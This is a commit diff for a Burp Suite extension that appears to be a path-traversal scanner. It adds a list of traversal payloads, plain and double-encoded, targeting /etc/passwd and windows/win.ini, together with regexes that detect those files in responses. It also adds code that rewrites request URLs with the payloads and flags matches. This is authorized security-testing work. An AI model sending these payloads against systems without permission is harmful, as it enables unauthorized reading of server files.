v0.1.1

Author: BitTheByte

list/payloads.list

@@ -0,0 +1,8 @@
+/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd
+/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd
+/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
+/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/etc/passwd
+/../../../../../../../../../../../../../../etc/passwd
+../../../../../../../../../../../../../../etc/passwd
+/../../../../../../../../../../../../../../windows/win.ini
+../../../../../../../../../../../../../../windows/win.ini

list/regex.list

@@ -0,0 +1,2 @@
+root:x:\d*:\d*:root
+\[fonts\]

src/burp/BurpExtender.java

@@ -1,13 +1,10 @@
 package burp;
 
 import scanner.Executor;
-import utils.UrlUtils;
 
 import java.io.IOException;
 import java.io.PrintWriter;
-import java.net.MalformedURLException;
 import java.net.URISyntaxException;
-import java.net.URL;
 
 public class BurpExtender implements burp.IBurpExtender, burp.IHttpListener
 {
@@ -25,7 +22,7 @@ public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks)
         stdout  = new PrintWriter(callbacks.getStdout(), true);
         stderr  = new PrintWriter(callbacks.getStderr(),true);
         helpers = callbacks.getHelpers();
-        stdout.println("0.1v - loaded");
+        stdout.println("0.1.1v - loaded");
 
         callbacks.registerHttpListener(this);
     }

src/scanner/Detector.java

@@ -3,30 +3,55 @@
 
 import burp.BurpExtender;
 import burp.IHttpRequestResponse;
+import utils.UrlUtils;
+
+import java.io.IOException;
 import java.net.MalformedURLException;
+import java.net.URL;
+import java.util.HashMap;
+import java.util.Map;
+import java.util.regex.Pattern;
 
-import static burp.BurpExtender.stdout;
+import static burp.BurpExtender.stderr;
 
 public class Detector {
-    private static  String[] staticRegex = {
-            // ".*?",
-            "root:x:\\d*:\\d*:root"
-    };
+    private static String[] staticRegex;
 
+    static {
+        try {
+            staticRegex = UrlUtils.getHTTPContent("https://raw.githubusercontent.com/BitTheByte/BitTraversal/master/list/regex.list").split("\n");
+            Logger.info(staticRegex);
+        } catch (IOException e) {
+            stderr.println(e);
+        }
+    }
 
-    public static String staticDetection(String content){
-        stdout.println(content);
-        for(String match: staticRegex){
-            if(content.replaceAll("\n","").replaceAll("\r","").matches(match))
+    public static String staticDetection(String content) {
+        for (String match : staticRegex) {
+            if (Pattern.compile(match).matcher(content).find())
                 return String.format(Template.static_match_template, match);
         }
         return null;
     }
 
-    public static String dynamicDetection(String content){
+
+    private static Map<String, String> responseMap = new HashMap<>();
+
+    public static String dynamicDetection(String url, String content) throws MalformedURLException {
+        for (Map.Entry<String, String> entry : responseMap.entrySet()) {
+            if (entry.getValue().equals(content) &&
+                    new URL(url).getHost().equals(new URL(entry.getKey()).getHost())) {
+                return String.format(Template.dynamic_match_template, url, entry.getKey());
+            }
+        }
+
+        if (!responseMap.containsKey(url))
+            responseMap.put(url, content);
+
         return null;
     }
 
+
     public static void report(IHttpRequestResponse messageInfo, String match) throws MalformedURLException {
         BurpExtender.callbacks.addScanIssue(new Reporter(
                 messageInfo,

src/scanner/Executor.java

@@ -19,12 +19,12 @@
 public class Executor {
     public static String CRLF = "\r\n";
 
-    private IHttpRequestResponse getHTTPResponse(IHttpRequestResponse basepair, String url, List<String> headers) throws IOException, NoSuchFieldException {
+    private IHttpRequestResponse getHTTPResponse(IHttpRequestResponse basepair, String url, List<String> headers) throws IOException {
         HttpURLConnection connection = (HttpURLConnection) new URL(url).openConnection();
         StringBuilder request = new StringBuilder();
 
-        for (String line: headers){
-            if(line.contains("HTTP/")){
+        for (String line : headers) {
+            if (line.contains("HTTP/")) {
                 request.append(String.format("%s %s HTTP/1.1%s",
                         helpers.analyzeRequest(basepair).getMethod(),
                         new URL(url).getPath(),
@@ -62,13 +62,19 @@ public void Scan(IHttpRequestResponse messageInfo) throws IOException, URISyntax
         URL baseURL = UrlUtils.clearSemiColon(UrlUtils.clearQueryParameters(requestURL));
 
         for (String mutation: Mutator.mutate(baseURL)){
-            try{
+            try {
                 IHttpRequestResponse pair = this.getHTTPResponse(messageInfo, mutation, requestInfo.getHeaders());
-                String staticMatch = Detector.staticDetection(new String(pair.getResponse(), StandardCharsets.UTF_8));
-                // String dynamicMatch = Detector.dynamicDetection(content);
-                if (staticMatch != null){
+
+                String content = new String(pair.getResponse(), StandardCharsets.UTF_8);
+                String staticMatch = Detector.staticDetection(content);
+                //String dynamicMatch = Detector.dynamicDetection(mutation, content);
+
+                if (staticMatch != null)
                     Detector.report(pair, staticMatch);
-                }
+
+                //if (dynamicMatch != null)
+                //    Detector.report(pair, dynamicMatch);
+
             }catch (Exception e){
                 stderr.println(e);
             }

src/scanner/Logger.java

@@ -0,0 +1,23 @@
+package scanner;
+
+import burp.BurpExtender;
+
+import java.util.List;
+
+class Logger {
+    public static void info(List<String> msg) {
+        for (String line : msg) {
+            BurpExtender.stdout.println(line);
+        }
+    }
+
+    public static void info(String[] msg) {
+        for (String line : msg) {
+            BurpExtender.stdout.println(line);
+        }
+    }
+
+    public static void info(String msg) {
+        BurpExtender.stdout.println(msg);
+    }
+}

src/scanner/Mutator.java

@@ -2,37 +2,32 @@
 
 import utils.UrlUtils;
 
-import java.io.BufferedReader;
 import java.io.IOException;
-import java.io.InputStreamReader;
-import java.net.HttpURLConnection;
-import java.net.URI;
 import java.net.URL;
 import java.util.ArrayList;
 import java.util.Arrays;
 import java.util.List;
 
-import static burp.BurpExtender.helpers;
-import static burp.BurpExtender.stdout;
+import static burp.BurpExtender.stderr;
 
 public class Mutator {
-    static List<String> staticPayloads = new ArrayList<>();
-
-    private static void populateStaticPayloads() throws IOException {
-        if (!staticPayloads.isEmpty())
-            return;
-
-        HttpURLConnection conn = (HttpURLConnection) new URL("https://pastebin.com/raw/n0ayCmxr").openConnection();
-        BufferedReader br = new BufferedReader(new InputStreamReader(conn.getInputStream()));
-        for (String line = br.readLine(); line != null; line = br.readLine()) {
-            staticPayloads.add(line);
+    static List<String> staticPayloads;
+
+    static {
+        try {
+            staticPayloads = Arrays.asList(UrlUtils.getHTTPContent("https://raw.githubusercontent.com/BitTheByte/BitTraversal/master/list/payloads.list").split("\n"));
+            Logger.info(staticPayloads);
+        } catch (IOException e) {
+            stderr.println(e);
         }
-        br.close();
-        conn.disconnect();
     }
 
-    private static List<String> staticMutator(URL url) throws IOException {
-        populateStaticPayloads();
+    private static List<String> dynamicMutator(URL url) {
+        throw new RuntimeException("not implemented");
+    }
+
+    private static List<String> staticMutator(URL url) {
+
         List<String> mutations = new ArrayList<>();
         String[] pathSegments = url.getPath().split("/");
 
@@ -48,14 +43,14 @@ private static List<String> staticMutator(URL url) throws IOException {
                 continue;
             for (String payload: staticPayloads){
                 mutations.add(baseURL + payload);
-                stdout.println(baseURL + payload);
+                Logger.info(baseURL + payload);
             }
-            baseURL.append(segment).append("/");
+            baseURL.append(segment);
         }
         return mutations;
     }
 
-    public static List<String> mutate(URL url) throws IOException {
+    public static List<String> mutate(URL url) {
         return staticMutator(url);
     }
 }

src/scanner/Template.java

@@ -1,16 +1,14 @@
 package scanner;
 
-import sun.misc.IOUtils;
-
 import java.io.BufferedReader;
 import java.io.IOException;
 import java.io.InputStream;
 import java.io.InputStreamReader;
-import java.nio.charset.StandardCharsets;
 import java.util.stream.Collectors;
 
 public class Template {
     public static String static_match_template = "";
+    public static String dynamic_match_template = "";
 
     static {
         try {
@@ -21,4 +19,14 @@ public class Template {
             e.printStackTrace();
         }
     }
+
+    static {
+        try {
+            InputStream in = Template.class.getClassLoader().getResources("templates/dynamic-report.html").nextElement().openStream();
+            dynamic_match_template = new BufferedReader(new InputStreamReader(in))
+                    .lines().collect(Collectors.joining("\n"));
+        } catch (IOException e) {
+            e.printStackTrace();
+        }
+    }
 }

src/templates/dynamic-report.html

@@ -0,0 +1 @@
+<!-- TODO -->

src/utils/UrlUtils.java

@@ -3,18 +3,18 @@
 import burp.IHttpRequestResponse;
 import burp.IHttpService;
 
+import java.io.BufferedReader;
+import java.io.IOException;
+import java.io.InputStreamReader;
 import java.net.*;
-import java.util.Iterator;
 
 public class UrlUtils {
     public static String CRLF = "\r\n";
 
     public static String dumpHeaders(HttpURLConnection conn) {
         StringBuilder sb = new StringBuilder();
-        Iterator<?> it = conn.getHeaderFields().keySet().iterator();
-        while (it.hasNext()) {
-            String name = (String) it.next();
-            if(name != null){
+        for (String name : conn.getHeaderFields().keySet()) {
+            if (name != null) {
                 sb.append(name);
                 sb.append(": ");
             }
@@ -25,8 +25,20 @@ public static String dumpHeaders(HttpURLConnection conn) {
         return sb.toString();
     }
 
+    public static String getHTTPContent(String url) throws IOException {
+        HttpURLConnection conn = (HttpURLConnection) new URL(url).openConnection();
+        BufferedReader br = new BufferedReader(new InputStreamReader(conn.getInputStream()));
+        StringBuilder response = new StringBuilder();
+        for (String line = br.readLine(); line != null; line = br.readLine()) {
+            response.append(line).append("\n");
+        }
+        br.close();
+        conn.disconnect();
+        return response.toString();
+    }
+
 
-    public static  URL clearQueryParameters(URL url) throws URISyntaxException, MalformedURLException {
+    public static URL clearQueryParameters(URL url) throws URISyntaxException, MalformedURLException {
         URI uri = url.toURI();
         return new URI(uri.getScheme(),
                 uri.getAuthority(),